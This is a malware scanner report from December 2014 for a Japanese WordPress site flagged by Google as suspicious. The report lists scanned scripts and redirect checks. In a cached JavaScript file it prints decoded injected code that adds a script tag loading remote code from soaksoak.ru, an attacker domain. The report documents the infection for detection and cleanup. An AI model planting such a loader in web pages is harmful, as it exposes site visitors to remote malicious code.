New scan:

Malware Scanner report for win5-yosou.com

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "win5-yosou.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=win5-yosou.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://win5-yosou.com/
200 OK
Content-Length: 28339
Content-Type: text/html
clean
http://win5-yosou.com/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/cache/head-cleaner/js/36183e9c48c3ba5e187f4b986b43a1be.js
200 OK
Content-Length: 2284
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/cache/head-cleaner/js/cc05da8259f9757b9e0c4166ffe84b58.js
200 OK
Content-Length: 7028
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/cache/head-cleaner/js/908c4e6af2a56b1a8873bfd22a45195d.js
200 OK
Content-Length: 10845
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: soaksoak.ru

var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLow
...[3669 bytes skipped]...

Decoded script:


function f() {
if (J) {
return;
}
try {
var Z = j.getElementsByTagName("body")[0].appendChild(C("span"));
Z.parentNode.removeChild(Z);
} catch (aa) {
return;
}
J = true;
var X = U.length;
for (var Y = 0; Y < X; Y++) {
U[Y]();
}
}
(function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }());
(function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }());

http://win5-yosou.com/wp-content/cache/head-cleaner/js/eb7c97209ed8acb2feea7160fe4e2664.js
200 OK
Content-Length: 144
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/themes/dynamic/js/jscript.js
200 OK
Content-Length: 1933
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/themes/dynamic/js/scroll.js
200 OK
Content-Length: 580
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/themes/dynamic/js/comment.js
200 OK
Content-Length: 2278
Content-Type: application/x-javascript
clean
http://rranking15.ziyu.net/rank.php?win5yosou
200 OK
Content-Length: 391
Content-Type: application/x-javascript
clean
http://rranking15.ziyu.net/js/win5yosou.js
200 OK
Content-Length: 7044
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: win5-yosou.com

...[1511 bytes skipped]...
k+'>97</TD></TR><TR><TD bgcolor="#FFFFFF"'+acrrrank+'>3</TD><TD align=left bgcolor="#FFFFFF"><A href="http://www.bing.com/" target=_blank>bingŒŸõ</A></TD><TD bgcolor="#FFFFFF" nowrap '+acrrrank+'>60</TD></TR><TR><TD bgcolor="#fafafa"'+acrrrank+'>4</TD><TD align=left bgcolor="#fafafa"><A href="http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com" target=_blank>http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com</A></TD><TD bgcolor="#fafafa" nowrap '+acrrrank+'>41</TD></TR><TR><TD bgcolor="#FFFFFF"'+acrrrank+'>5</TD><TD align=left bgcolor="#FFFFFF"><A href="http://racejack.s40.xrea.com/" target=_blank>ƒŒ[ƒXƒWƒƒƒbƒN</A></TD><TD bgcolor="#FFFFFF" nowrap '+acrrrank+'>40</TD></TR><TR><TD bgcolor="#fafafa"'+acrrrank+'&
...[2535 bytes skipped]...

Decoded script:

...[1464 bytes skipped]...
>97</TD></TR><TR><TD bgcolor="#FFFFFF" align=center>3</TD><TD align=left bgcolor="#FFFFFF"><A href="http://www.bing.com/" target=_blank>bingŒŸõ</A></TD><TD bgcolor="#FFFFFF" nowrap align=center>60</TD></TR><TR><TD bgcolor="#fafafa" align=center>4</TD><TD align=left bgcolor="#fafafa"><A href="http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com" target=_blank>http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com</A></TD><TD bgcolor="#fafafa" nowrap align=center>41</TD></TR><TR><TD bgcolor="#FFFFFF" align=center>5</TD><TD align=left bgcolor="#FFFFFF"><A href="http://racejack.s40.xrea.com/" target=_blank>ƒŒ[ƒXƒWƒƒƒbƒN</A></TD><TD bgcolor="#FFFFFF" nowrap align=center>40</TD></TR><TR><TD bgcolor="#fafafa" align=cen
...[6423 bytes skipped]...

http://blogroll.livedoor.net/js/blogroll.js
200 OK
Content-Length: 15522
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.32.0-2013.04.03
200 OK
Content-Length: 15479
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.4.1
200 OK
Content-Length: 7077
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.63
200 OK
Content-Length: 3598
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: win5-yosou.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 19:31:25 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://win5-yosou.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: win5-yosou.com
Referer: http://www.google.com/search?q=win5-yosou.com

Result:
The result is similar to the first query. There are no suspicious redirects found.